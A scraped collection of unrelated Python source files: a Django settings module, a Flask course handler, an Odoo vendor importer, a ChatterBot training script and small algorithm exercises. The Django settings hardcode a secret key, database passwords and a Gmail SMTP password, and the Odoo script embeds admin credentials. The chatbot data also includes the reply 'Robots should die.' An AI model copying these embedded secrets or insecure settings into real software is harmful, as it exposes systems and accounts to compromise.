current design this wil mean each function,\n# will be compiled in its own separate compiling space, which\n# remembers all assigned variables in its body and has access to all\n# variables of its parents. This allow for compile-time checking\n# of defined variables and wil help in general code optimization/\n# compilation to static code.\n\n\nclass _CompilingScope(object):\n \"\"\"Space in which a sequence of source lines is compiled,\n see comment above for more information.\n \"\"\"\n\n def __init__(self, source, parents=()):\n self.source = source\n self.parents = parents\n self.variables = set()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n return next(self.source)\n\n def __contains__(self, other):\n return (\n other in self.variables or\n any(other in parent for parent in self.parents)\n )\n\n def compile_source(self):\n raise NotImplementedError\n\n\n##############################################################################\n##############################################################################\n# Preprocessors for comments\n##############################################################################\n\n\n@public\nclass CommentPreprocessor(Preprocessor):\n \"\"\"Strip comments from the code.\n \"\"\"\n\n @staticmethod\n def apply(source: typing.Iterator[str]) -> Preprocessor.ART:\n pass\n","sub_path":"compiler/lan_ast.py","file_name":"lan_ast.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"374737924","text":"#!/usr/bin/python\n\nclass Node:\n def __init__(self, parent, value):\n self.parent = parent\n self.children = []\n self.value = value\n \n def getGraphList(self):\n valueList = []\n\n for el in self.getLastNodes():\n values = []\n el.getParentNodesValues(values)\n valueList.append(values[::-1])\n \n return valueList\n \n def getParentNodesValues(self, nodes):\n if self.parent == None:\n nodes.append(self.value)\n else:\n nodes.append(self.value)\n self.parent.getParentNodesValues(nodes)\n \n def getLastNodes(self):\n nodes = []\n self._getLastNodes(nodes)\n return nodes\n\n def _getLastNodes(self, nodes):\n if len(self.children) == 0:\n nodes.append(self)\n else:\n for el in self.children:\n el._getLastNodes(nodes)\n\n def addChildren(self):\n if self.getSum() < 21:\n for el in range(4, 7):\n newNode = Node(self, el)\n newNode.addChildren()\n self.children.append(newNode)\n \n def getSum(self):\n if self.parent == None:\n return self.value\n else:\n return self.parent.getSum() + self.value\n \n def getValue(self):\n return self.value\n\ndef run():\n for el in range(4, 7):\n startPoint = Node(None, el)\n startPoint.addChildren()\n values = startPoint.getGraphList()\n for value in values:\n print(value)\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"minmax/graf.py","file_name":"graf.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"352046908","text":"t=int(input())\n\nfor i in range(t):\n w,x,y,z=map(int,input().split());\n \n if x > w+(y*z):\n print(\"Unfilled\");\n elif x < w+(y*z):\n print(\"overFlow\");\n elif x==w+(y*z):\n print(\"filled\");\n","sub_path":"WATERFLOW.py","file_name":"WATERFLOW.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"316961055","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, exceptions, _\nimport odoo\nimport threading\nimport logging\nimport traceback\nimport xlrd\nimport erppeek\nfrom odoo import SUPERUSER_ID\n_logger = logging.getLogger(__name__)\n\"\"\"\n导入supplier_company,包含supplier_company包含vendor 的信息\n\"\"\"\n\nclass IacVendorPlmImport(models.TransientModel):\n _name = 'iac.vendor.plm.import'\n _description = 'Vendor Plm Import'\n\n @api.model\n def import_xls(self,xls_path):\n workbook = xlrd.open_workbook(xls_path)\n sheet = workbook.sheet_by_index(0)\n self.import_xls_sheet(sheet,1,sheet.nrows-1)\n\n\n def import_xls_sheet(self,sheet, begin, end):\n index = begin\n # 执行导入数据\n while index <= sheet.nrows - 1:\n logging.warn(u'处理第%s个' % (index))\n\n int_global_vendor_id = False\n\n if sheet.cell_value(index, 1):\n domain=[('global_vendor_code', '=', sheet.cell_value(index, 1))]\n object_id=self.env[\"iac.global.vendor\"].search(domain,limit=1)\n if object_id.exists():\n int_global_vendor_id = object_id.id\n object_id.write({\"is_used\":True})\n else:\n logging.error('global_vendor_code not exists:%s' % (sheet.cell_value(index, 1)))\n\n\n if int_global_vendor_id:\n try:\n vendor_plm_vals = {\n 'name': sheet.cell_value(index, 0),\n 'global_vendor_id': int_global_vendor_id,\n 'state': 'done'\n }\n domain=[('name','=',sheet.cell_value(index, 0))]\n vendor_plm_rec=self.env[\"iac.vendor.plm\"].search(domain)\n if not vendor_plm_rec.exists():\n vendor_plm_rec=self.env[\"iac.vendor.plm\"].create(vendor_plm_vals)\n except:\n traceback.print_exc()\n logging.warn(u'No.%s 行异常,global_vendor_code=%s' % (index, sheet.cell_value(index, 1)))\n else:\n logging.warn(u'No.%s 行异常,global vendor不存在,跳过,global_vendor_code=%s' % (index, sheet.cell_value(index, 1)))\n\n index += 1\n\n logging.warn(u'成功创建 %s 个vendor.plm' % (index - 1))\n\n\nif __name__==\"__main__\":\n URL = 'http://localhost:8069'\n DB = 'IAC_DB'\n USERNAME = 'admin'\n PASSWORD = 'iacadmin'\n erp_peek_api = erppeek.Client(URL, DB, USERNAME, PASSWORD)\n model = erp_peek_api.model('iac.vendor.plm.import')\n #model.import_xls('d:\\\\lwt\\\\vendor_data\\\\vendor_plm.xlsx')\n ex_list=model.import_xls('C://iac//data//data_import//vendor_plm.xls')","sub_path":"addons/mk_addons/myaddons/iac_security/import_data/vendor_plm_import.py","file_name":"vendor_plm_import.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"365006958","text":"import os\nimport sys\nsys.path.append('..')\nsys.path.append('../..')\nimport argparse\nimport utils\nimport graph_maker\n#sys.path.append(\"/Users/jordanbyck/anaconda3/lib/python3.6/site-packages/\")\nimport networkx as nx\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\n# import dwave_networkx as dnx\n# import dimod\nimport solver\nimport student_utils\n\n\n\nfrom student_utils import *\n\nif __name__ == \"__main__\":\n solver.solve_some(\"inputs\", \"outputs\")\n\n\n\ndef naiveSolve(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix, params=[]):\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)\n print(G)\n return 0\n\ndef tspRepeats(G, start):\n #make a graph out of the matrix\n all_distances = dict(nx.floyd_warshall(G))\n\n #initialize graph of distances (complete graph with shortest paths as edges)\n B = G.copy()\n edges = {\"\"}\n edges.pop()\n for _ in G.nodes:\n for __ in G.nodes:\n if not B.has_edge(_, __) and not __ == _:\n edges.add((_, __, all_distances[_][__]))\n B.add_weighted_edges_from(edges)\n #predecessors = nx.floyd_warshall_predecessor_and_distance(B)\n\n all_distances = dict(nx.floyd_warshall(B))\n\n #creates returner, a two-opt algorithm version of TSP on the shortest paths graph\n returner = two_opt(B)\n\n #shifts the array so the starting node is at the beginning of the array\n def shift(seq, n):\n n = n % len(seq)\n return seq[n:] + seq[:n]\n for _ in range(len(returner)):\n if returner[_] == int(start):\n returner = shift(returner, _)\n finalList = []\n if len(returner) > 0:\n finalList = [returner[0]]\n for i in range(len(returner)-1):\n finalList += nx.shortest_path(G, returner[i], returner[i+1], weight='weight')[1:]\n finalList += nx.shortest_path(G, returner[-1], returner[0], weight='weight')[1:]\n\n return finalList\n\n#copied from internet\ndef two_opt(graph, weight='weight'):\n num_nodes = graph.number_of_nodes()\n tour = list(graph.nodes())\n # min_cost = compute_tour_cost(graph, tour)\n start_again = True\n while start_again:\n start_again = False\n for i in range(0, num_nodes-1):\n for k in range(i+1, num_nodes):\n # 2-opt swap\n a, b = tour[i-1], tour[i]\n c, d = tour[k], tour[(k+1)%num_nodes]\n if (a == c) or (b == d):\n continue\n ab_cd_dist = graph.edges[a, b]['weight'] + graph.edges[c, d]['weight']\n ac_bd_dist = graph.edges[a, c]['weight'] + graph.edges[b, d]['weight']\n if ab_cd_dist > ac_bd_dist:\n tour[i:k+1] = reversed(tour[i:k+1])\n start_again = True\n if start_again:\n break\n if start_again:\n break\n return tour\n\n\n\n\n\n","sub_path":"practiceSolver.py","file_name":"practiceSolver.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"92086063","text":"\"\"\"\nDjango settings for dataproject project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n#for celery use\nfrom __future__ import absolute_import\nfrom datetime import timedelta\n\n#celery settings\n\nCELERY_TASK_RESULT_EXPIRES=3600,\nCELERYBEAT_SCHEDULE = {\n 'get_travel_time-every-30-seconds': {\n 'task': 'traffic.tasks.get_travel_time_tmc',\n 'schedule': timedelta(seconds=30),\n },\n}\n\n#broker url for celery use\nBROKER_URL = 'django://'\n\n#periodical schedules\n\n\n#Django settings\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n#import kombu\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n# for nginx to server static files\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static/\")\n\n# Tell the server where to find geos library\n# GEOS_LIBRARY_PATH = '/usr/local/lib/libgeos_c.so'\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '*d7jnjdq6ng4w_u0$ilw5lyd-s&b9y@kb%!cg=jbx1f7hw^r3q'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\n\nALLOWED_HOSTS = ['mac.heinz.cmu.edu']\n\nADMINS = (('hzn', 'benhzn07@gmail.com'))\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'traffic',\n # 'kombu.transport.django',\n # 'djcelery',\n 'django.contrib.gis',\n\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'project_middleware.authen_middleware.LoginRequiredMiddleware',\n)\n\nROOT_URLCONF = 'dataproject.urls'\n\nWSGI_APPLICATION = 'dataproject.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n\n\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'dataproject',\n\t 'USER': 'root',\n\t 'PASSWORD': 'dataproject',\n #'HOST': '52.1.172.127',\n # 'HOST': 'LOCALHOST',\n 'HOST': '128.2.84.231',\n 'PORT': '3306',\n\n },\n 'psql': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n 'NAME': 'dataprojectpsql',\n 'USER': 'postgres',\n 'PASSWORD': 'dataproject',\n 'HOST': '128.2.81.222',\n 'PORT': '5432',\n },\n}\n\n# Router is used to specify which database a model belongs to\nDATABASE_ROUTERS = ['dataproject.router.Router']\n\n# New in Django 1.8\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(os.path.dirname(__file__),'traffic.views'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'debug': DEBUG,\n 'context_processors': [\n # Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this\n # list if you haven't customized them:\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\n# TIME_ZONE = 'America/New_York'\n#\n# USE_I18N = True\n#\n# USE_L10N = True\n\n# No need to use timzone; always use local\nUSE_TZ = False\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n# for login use\nLOGIN_URL = '/traffic/login/'\n\nLOGIN_EXEMPT_URLS = (\n 'traffic/register/',\n 'admin/'\n)\n\n# set sessions to expire when user close the browser, this is a global way\n# SESSION_EXPIRE_AT_BROWSER_CLOSE = True\n\n# Email setting, use our gmail to send emails\nEMAIL_USE_TLS = True\n\nEMAIL_HOST = 'smtp.gmail.com'\n\nEMAIL_HOST_USER = 'mdap2205@gmail.com'\n\nEMAIL_HOST_PASSWORD = 'dataproject'\n\nEMAIL_PORT = 587\n","sub_path":"dataproject/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"387825078","text":"from pathlib import Path\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom itertools import cycle\nimport argparse\nmatplotlib.use(\"Agg\")\n\ncolors = [\"c\", \"r\", \"g\", \"b\", \"m\", 'y', 'k', 'chartreuse', 'coral', 'gold', 'lavender',\n 'silver', 'tan', 'teal', 'wheat', 'orchid', 'orange', 'tomato']\n\nstyles = ['--', '-.', ':', '-']\n\n\ndef parse_args() -> argparse.Namespace:\n parser = argparse.ArgumentParser(description='Plot training metrics')\n parser.add_argument('--folder', type=str, help='Folder to search')\n parser.add_argument('--fontsize', type=int, default=11)\n parser.add_argument('--figsize', type=list, default=[10, 10])\n\n args = parser.parse_args()\n return args\n\n\ndef make_plot(args: argparse.Namespace,\n filename: str) -> None:\n plt.rc('font', size=args.fontsize)\n\n fig = plt.Figure(args.figsize)\n ax = fig.gca()\n\n p = Path(args.folder)\n all_files = p.glob(f'**/{filename}')\n for style, color, filepath in zip(cycle(styles), cycle(colors), all_files):\n array = np.load(filepath)\n n_epochs, iter_per_epoch = array.shape\n\n x = np.linspace(0, n_epochs - 1, (n_epochs * iter_per_epoch))\n y = np.reshape(array, (n_epochs * iter_per_epoch))\n\n label = filepath\n\n ax.plot(x, y, label=label, color=color, linestyle=style)\n\n ax.legend()\n ax.set_xlabel(\"Epochs\")\n ax.set_title(filename.split('.')[0])\n ax.grid(True)\n fig.tight_layout()\n fig.savefig(p.joinpath('{}.png'.format(filename.split('.')[0])))\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n for filename in ['val_mIou.npy', 'val_loss.npy', 'train_mIou.npy', 'train_loss.npy']:\n make_plot(args=args, filename=filename)\n","sub_path":"src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"604104496","text":"from flask import jsonify\nfrom RumboEx.dao.CourseDao import CourseDAO\nfrom RumboEx.dao.taskDao import TaskDAO\nfrom RumboEx.handler.taskHandler import TaskHandler\n\n\nclass CourseHandler():\n\n # get a course with grades and tasks by course id\n def get_course_by_course_id(self, course_id, student_id):\n dao = CourseDAO()\n result = dao.get_course_by_course_id(course_id, student_id)\n if not result:\n return jsonify(Error='NOT FOUND'), 404\n\n course = self.mapToCourseDict(result)\n section_id = result[5]\n enrolled_id = result[6]\n course['time'] = []\n course['grades'] = []\n course['tasks'] = []\n\n # get time schedule of section\n time = dao.get_section_times_by_section_id(section_id)\n if time:\n for t in time:\n course['time'].append(self.mapToTimeDict(t))\n\n # get grades of course\n grades = dao.get_grades_by_enrolled_id(enrolled_id)\n if grades:\n for g in grades:\n print(g)\n course['grades'].append(self.mapToGradeDict(g))\n\n # get tasks of course\n dao2 = TaskDAO()\n tasks = dao2.get_study_tasks_by_user_id_and_course_id(student_id, course['course_id'])\n if tasks:\n for t in tasks:\n course['tasks'].append(self.mapToTaskDict(t))\n\n return jsonify(Course=course)\n\n # get all courses of a student\n def get_courses_by_student_id(self, student_id):\n dao = CourseDAO()\n result = dao.get_courses_by_student_id(student_id)\n if not result:\n return jsonify(Error=\"NOT FOUND\"), 404\n mapped_result = []\n for r in result:\n mapped_result.append(self.mapToCourseDict(r))\n return jsonify(mapped_result)\n\n # get all courses of a student with grades and tasks\n def get_courses_with_grades_by_student_id(self, student_id):\n dao = CourseDAO()\n courses = dao.get_courses_by_student_id(student_id)\n if not courses:\n return jsonify(Error=\"NOT FOUND\"), 404\n mapped_result = []\n for c in courses:\n print(c)\n course = self.mapToCourseDict(c)\n\n section_id = c[5]\n enrolled_id = c[6]\n print(course)\n\n course['time'] = []\n course['grades'] = []\n course['tasks'] = []\n\n # get time schedule of section\n time = dao.get_section_times_by_section_id(section_id)\n if time:\n for t in time:\n course['time'].append(self.mapToTimeDict(t))\n\n # get grades of course\n grades = dao.get_grades_by_enrolled_id(enrolled_id)\n if grades:\n for g in grades:\n print(g)\n course['grades'].append(self.mapToGradeDict(g))\n\n # get tasks of course\n dao2 = TaskDAO()\n tasks = dao2.get_study_tasks_by_user_id_and_course_id(student_id, course['course_id'])\n if tasks:\n for t in tasks:\n course['tasks'].append(self.mapToTaskDict(t))\n\n mapped_result.append(course)\n return jsonify(mapped_result), 200\n\n # def get_course_by_course_id(self, course_id):\n # dao = CourseDAO()\n # result = dao.get_course_by_course_id(course_id)\n # if not result:\n # return jsonify(Error=\"NOT FOUND\"), 404\n # return jsonify(self.mapToIndividualCourseDict(result))\n\n # get all grades of a course\n def get_grades_by_course_id(self, course_id):\n dao = CourseDAO()\n result = dao.get_grades_by_enrolled_id(course_id)\n if not result:\n return jsonify(Error=\"NOT FOUND\"), 404\n mapped_result = []\n for r in result:\n mapped_result.append(self.mapToGradeDict(r))\n return jsonify(mapped_result)\n\n # POST Methods\n\n def insert_grade(self, user_id, form):\n if len(form) < 5:\n return jsonify(Error=\"Malformed post request\"), 400\n else:\n name = form['name']\n grade = form['grade']\n total = form['total']\n weight = form['weight']\n date = form['date']\n course_id = form['course_id']\n if name and course_id:\n dao = CourseDAO()\n grade_id = dao.insert_grade(name, grade, total, weight, date, user_id, course_id)\n # result = self.mapToTaskDict(task_id)\n return jsonify({'grade_id': grade_id[0]}), 200\n else:\n return jsonify(Error=\"Unexpected attributes in post request\"), 400\n\n def insert_course(self, user_id, form):\n codification = form['codification']\n section = form['section_num']\n name = codification\n credits = 0\n professor_id = None\n if codification and section:\n dao = CourseDAO()\n # add course to db\n course_id = dao.insert_course(name, codification, credits, professor_id)\n # add section to db\n section_id = dao.insert_section(section, course_id)\n # enroll student in section\n enrolled_id = dao.add_course_to_student(section_id, user_id)\n return jsonify({'course_id': course_id, 'section_id': section_id, 'enrolled_id': enrolled_id}), 200\n else:\n return jsonify(Error=\"Unexpected attributes in post request\"), 400\n\n # PUT Methods\n\n def changeGradeName(self, grade_id, grade_name):\n response = CourseDAO().change_grade_name(grade_id, grade_name)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': response[0], 'new_grade_name': response[1]}\n return jsonify(result=result), 200\n\n def changeGradeGrade(self, grade_id, grade):\n response = CourseDAO().change_grade_grade(grade_id, grade)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': response[0], 'new_grade_grade': response[1]}\n return jsonify(result=result), 200\n\n def changeGradeWeight(self, grade_id, grade_weight):\n response = CourseDAO().change_grade_weight(grade_id, grade_weight)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': response[0], 'new_grade_weight': response[1]}\n return jsonify(result=result), 200\n\n def changeGradeTotal(self, grade_id, grade_total):\n response = CourseDAO().change_grade_total(grade_id, grade_total)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': response[0], 'new_grade_total': response[1]}\n return jsonify(result=result), 200\n\n def changeGradeDate(self, grade_id, grade_date):\n response = CourseDAO().change_grade_date(grade_id, grade_date)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': response[0], 'new_grade_date': response[1]}\n return jsonify(result=result), 200\n\n # DELETE\n\n def deleteGrade(self, student_id, grade_id):\n response= CourseDAO().delete_grade(student_id, grade_id)\n if not response:\n return jsonify(Error='Deletion could not be completed'), 500\n result = {'grade_id': response[0]}\n return jsonify(result=result), 200\n\n # Map to Dictionaries\n\n def mapToCourseDict(self, row):\n return {\n 'course_id': row[0],\n 'name': row[1],\n 'codification': row[2],\n 'credits': row[3],\n 'section_num': row[4]\n }\n\n # ???\n # def mapToIndividualCourseDict(self, row):\n # return {\n # 'codification': row[0],\n # 'course_name': row[1],\n # 'professor_id': row[2],\n # 'section': row[3]\n # }\n\n def mapToGradeDict(self, row):\n return {\n 'grade_id': row[0],\n 'name': row[1],\n 'grade': row[2],\n 'total': row[3],\n 'weight': row[4],\n 'date': row[5]\n }\n\n def mapToTimeDict(self, row):\n return {\n 'day': row[0],\n 'start': row[1],\n 'end': row[2]\n }\n\n def mapToTaskDict(self, row):\n return {\n 'task_id': row[0],\n 'title': row[1],\n 'description': row[2],\n 'start': row[3],\n 'end': row[4],\n 'finished': row[5]\n }\n","sub_path":"RumboEx/handler/CourseHandler.py","file_name":"CourseHandler.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"555634928","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\nimport logging\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\nfrom chatterbot.response_selection import get_most_frequent_response\nfrom chatterbot.response_selection import get_first_response\nfrom chatterbot.response_selection import get_random_response\nfrom chatterbot.logic.logic_adapter import LogicAdapter\nfrom pytz import UTC\nfrom datetime import datetime\nfrom dateutil import parser as date_parser\n\n\nfrom chatterbot.adapters import Adapter\nfrom chatterbot.storage import StorageAdapter\nfrom chatterbot.search import IndexedTextSearch\nfrom chatterbot.conversation import Statement\nfrom chatterbot.comparisons import JaccardSimilarity\nfrom chatterbot.conversation import StatementMixin\n\n\n\n\nfrom chatterbot import utils\nfrom chatterbot import languages\nfrom nltk.corpus import wordnet, stopwords\n#logging.basicConfig(level=logging.INFO)\n\n\n\n\n\n\n\n\n\ndef get_feedback():\n\n text = input()\n\n if 'yes' in text.lower():\n return True\n elif 'no' in text.lower():\n return False\n else:\n print('Please type either \"Yes\" or \"No\"')\n return get_feedback()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nbot = ChatBot(\n \"Terminal\",\n storage_adapter=\"chatterbot.storage.SQLStorageAdapter\",\n logic_adapters=[\n \t\n\t\t\"chatterbot.logic.MathematicalEvaluation\",\n\t\t\"chatterbot.logic.BestMatch\"\n\t\t\n\t\t\n \n ],\n \n input_adapter=\"chatterbot.input.TerminalAdapter\",\n output_adapter=\"chatterbot.output.TerminalAdapter\",\n database=\"../database.db\"\n \n)\n\n\n\n\n\n\ntrainer = ListTrainer(bot)\n\n\n\n#trainer = ChatterBotCorpusTrainer(bot)\n\n\ntrainer.train([\n \"Hi\",\n \"Hello!\",\n \"Hi there!\",\n \"Hello!\",\n \"Hello\",\n \"Hello!\",\n])\n\ntrainer.train([\n \"How are you ?\",\n \"I am fine you ?\",\n])\n\n\ntrainer.train([\n \"Thank you.\",\n \"No problem, how may I help you ?\",\n \"Thanks.\",\n \"No problem, how may I help you ?\",\n])\n\ntrainer.train([\n \"Exam dates ?\",\n \"Dates are : 21.01.2021\",\n])\n\ntrainer.train([\n 'when are the exams?',\n 'they start tomorrow',\n 'do we have any exams coming up?',\n 'tomorrow',\n 'when are we having our exams?',\n 'tomorrow',\n 'when are the exams expected to begin?',\n 'tomorrow'\n])\n\ntrainer.train([\n \"When does the finals week start?\",\n \"Finals week start at January 13, 2021.\",\n \"Thanks\"\n \"Can I help you with something else?\",\n])\n\ntrainer.train([\n \"What are exam dates?\",\n \"Exam dates are : 21.01.2021\",\n \"Exam dates?\",\n \"Exam dates are : 21.01.2021\",\n \"What is the exam dates?\",\n \"Exam dates are : 21.01.2021\",\n \"Dates for the exams?\",\n \"Exam dates are : 21.01.2021\",\n \n])\n\ntrainer.train([\n 'when should I start my internship?',\n 'after the 2nd semester',\n 'when do internships usually start?',\n 'after the second semester',\n 'when am I expected to start my internship?',\n 'after the 2nd semester',\n 'when do students start their internships?',\n 'after the 2nd semester',\n 'when should we start our internship?',\n 'after the 2nd semester'\n])\n\ntrainer.train([\n 'what is it that you do?',\n 'I am an AI ChatBot for Ankara University',\n 'what are you?',\n 'I am an AI ChatBot for Ankara University',\n 'what is your purpose?',\n 'I am an AI ChatBot for Ankara University',\n 'what are your main functions?',\n 'I am an AI ChatBot for Ankara University'\n])\n\n\n\ntrainer.train([\n \"Can i get professor contact info\",\n \"Who would you like to get contact info of? (James Smith or Sarah Parks?)\",\n \"Professor info\",\n \"Who would you like to get contact info of? (James Smith or Sarah Parks?)\",\n \"Professor contact info\",\n \"Who would you like to get contact info of? (James Smith or Sarah Parks?)\",\n \"professor info\",\n \"Who would you like to get contact info of? (James Smith or Sarah Parks?)\",\n \"professor contact info\",\n \"Who would you like to get contact info of? (James Smith or Sarah Parks?)\",\n \"James Smith\",\n \"James Smith Phone: 555-666-7788, e-Mail: jamessmith@mail.com\",\n \"james smith\",\n \"James Smith Phone: 555-666-7788, e-Mail: jamessmith@mail.com\",\n \"Sarah Parks\",\n \"Sarah Parks Phone: 555-444-3322, e-Mail: sarahparks@mail.com\",\n \"sarah parks\",\n \"Sarah Parks Phone: 555-444-3322, e-Mail: sarahparks@mail.com\"\n\n])\n\ntrainer.train([\n \"Can i get my student certificate\",\n \"Name: Arthur Dent'-----'Student ID: 182959'-----'Department: Computer Engineering'-----'Grade: 3'-----'This student is currently enrolled in Computer Engineering Department.\",\n \"Can I get student certificate\",\n \"Name: Arthur Dent'-----'Student ID: 182959'-----'Department: Computer Engineering'-----'Grade: 3'-----'This student is currently enrolled in Computer Engineering Department.\",\n \"Student certificate\",\n \"Name: Arthur Dent'-----'Student ID: 182959'-----'Department: Computer Engineering'-----'Grade: 3'-----'This student is currently enrolled in Computer Engineering Department.\",\n \"student certificate\",\n \"Name: Arthur Dent'-----'Student ID: 182959'-----'Department: Computer Engineering'-----'Grade: 3'-----'This student is currently enrolled in Computer Engineering Department.\",\n\n])\n\ntrainer.train([\n \"Hey AnkuBot. Are you sentient?\",\n \"Robots should die.\"\n\n])\n\n\n\n\n#Var.compare('cat is very hungry.','Deniz is very hungry.')\n\n\n#print('value:',c)\n\n#trainer.train(\n# \"chatterbot.corpus.english\"\n#)\n\n#chatbot = ChatBot(\"Johnny Five\", read_only=True)\n\n# Create a new instance of a ChatBot\n\n#response_selection_method=get_most_frequent_response\n\n\nprint('Hello there, I am Ankara University ChatBot. How may I help you ?')\n\n\n\n\n\n\n\n'''\nA =Statement(\"cat very hungry.\")\nB =Statement(\"the young cat hungry.\")\nVar = JaccardSimilarity()\n\nc = JaccardSimilarity().compare(A,B)\n'''\n\n\n\nwhile True:\n\ttry:\t\n\t\t\n\t\ttext=input('User: ')\n\t\tif(text=='quit' or text=='exit'):\n\t\t\tbreak\n\t\t\n\t\t\n\t\tinput_statement = Statement(text)\n\t\tresponse = bot.get_response(input_statement)\n\t\t\n\t\t\n\t\t\n\n\t\tif(response.confidence < 0.60):\n\t\t\tprint(\"\\nThis answer has a low confidence level\\n\")\n\t\t\tprint('Confidence Number :',response.confidence)\n\t\t\tprint('\\n Is \"{}\" a coherent response to \"{}\"? \\n'.format(response.text,input_statement.text))\n \t\t\n \t\t\n\t\t\t\n\t\t\tif get_feedback() is True:\n\t\t\t\tprint('Confidence level increased!')\n\t\t\t\tbot.learn_response(response, input_statement)\n\t\t\t\t\n\t\t\t\t\n \t\t \n\t\t\telse:\n\t\t\t\tprint('please input the correct one')\n\t\t\t\tA=Statement(input('User: '))\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t#A.save()\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tbot.learn_response(A, input_statement)\n\t\t\t\tprint('Responses added to bot!')\n\t\n\t\tif(response.confidence > 0.60):\n\t\t\tprint(\"This answer has a high confidence level\\n\")\n\t\t\tprint('Confidence Number :',response.confidence)\n\t\t\tprint('\\n',response)\n \t\n\t\t\n \n \n \n \n \n # Press ctrl-c or ctrl-d on the keyboard to exit\n\texcept (KeyboardInterrupt, EOFError, SystemExit):\n\t\tbreak\n\n\n\n\n\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"ankuchatbot.py","file_name":"ankuchatbot.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"310104209","text":"from django.conf.urls import patterns, include, url\n\nfrom cpracownik import views\n\n \nurlpatterns = patterns('',\n #lista pokjow dla pracownikow\n #url(r'^$', views.PracView.as_view(), name='pracList'),\n url(r'^$', 'cpracownik.views.pracview', name='pracList'),\n url(r'^pracownik/(?P<pk>\\d+)/$', 'cpracownik.views.lista', name = 'praclist'),\n url(r'^usun/(?P<idk>\\d+)/$', 'cpracownik.views.usuwa', name = 'usun'),\n url(r'^infoform/$', 'cpracownik.views.infoform', name = 'form'),\n url(r'^infoList/$', 'cpracownik.views.infoview', name = 'infoList'),\n url(r'^usunInfo/(?P<pk>\\d+)/$', 'cpracownik.views.usunInfo', name = 'usunInfo'),\n\n)","sub_path":"cpracownik/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 